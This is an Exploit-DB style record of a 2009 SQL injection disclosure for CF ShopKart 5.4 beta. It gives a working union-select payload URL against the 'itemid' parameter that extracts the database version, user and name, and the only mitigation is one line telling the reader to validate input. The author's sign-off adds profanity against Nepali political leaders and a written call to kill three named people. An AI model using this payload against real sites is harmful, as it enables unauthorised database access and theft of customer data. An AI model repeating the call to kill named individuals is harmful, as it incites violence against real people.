CF ShopKart SQL vulnerability

vendor:

CF ShopKart

by:

learn3r hacker from Nepal

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: CF ShopKart

Affected Version From: 5.4 beta

Affected Version To: 5.4 beta

Patch Exists: NO

Related CWE: N/A

CPE: a:cf_shopkart:cf_shopkart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

CF ShopKart SQL vulnerability

A SQL injection vulnerability exists in CF ShopKart version 5.4 beta or lower. The affected variable is 'item' and an example of the exploit is http://demo.cfshopkart.com/index.cfm?carttoken=E48384J091709064002&action=ViewDetails&itemid=-928+union+all+select+concat(@@version,user(),database()),2--+. The results of the second query can be seen in the <title> tag.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#####################################
#   CF ShopKart SQL vulnerability   #
#   By learn3r hacker from Nepal    #
#     damagicalhacker@gmail.com     #
#####################################

Product name: CF ShopKart
Version: 5.4 beta or may be lower
Product home: www.cfshopkart.com

Affected variable: item

SQLi examples:
http://demo.cfshopkart.com/index.cfm?carttoken=E48384J091709064002&action=ViewDetails&itemid=-928+union+all+select+concat(@@version,user(),database()),2--+

Note that the results of second query are seen in the <title> tag...


Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!

# milw0rm.com [2009-09-17]